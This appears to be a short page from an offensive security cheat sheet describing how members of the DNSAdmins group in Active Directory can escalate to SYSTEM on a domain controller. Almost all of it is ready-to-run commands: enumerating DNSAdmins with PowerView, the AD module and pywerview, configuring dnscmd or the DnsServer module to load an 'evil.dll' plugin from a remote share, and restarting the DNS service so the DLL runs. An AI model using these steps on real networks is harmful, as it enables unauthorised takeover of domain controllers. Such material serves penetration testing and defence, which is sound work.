DNS Administrators
DNS Administrators have the ability to load arbitrary DLL's using dns.exe. Since dns.exe runs as system, you can run commands through that dll as system.
You will need the privileges necessary to restart the DNS service to conduct this attack.
Attacking DNS Admins
Enumerate DNS Admins
# PowerView
Get-NetGroupMember -GroupName "DNSAdmins"
#Ad Module
Get-ADGroupMember -Identity "DNSAdmins"
From Linux
# pywerview.py
./pywerview.py get-netgroupmember -u <user> -p <pass> --dc-ip <ip> --groupname "DNSAdmins"
Exploitation
With the privileges of a DNS Admin, configure the DLL using dnscmd.exe (requires RSAT DNS).
Host a dll on a share and use it as a plugin
# using dnscmd.exe
dnscmd dcorp-dc /config /serverlevelplugindll \\<share_ip>\dll\evil.dll
# using DNSServer Module
$dnsettings = Get-DnsServerSetting -ComputerName <dc> -Verbose -All
$dnsettings.ServerLevelPluginDll = "\\<share_ip>\dll\evil.dll"
Set-DnsServerSetting -InputObject $dnsettings -ComputerName <dc> -Verbose
Then restart the DNS service and await what you expect from the DLL.
sc \\<dc> stop dns
sc \\<dc> start dns
Last updated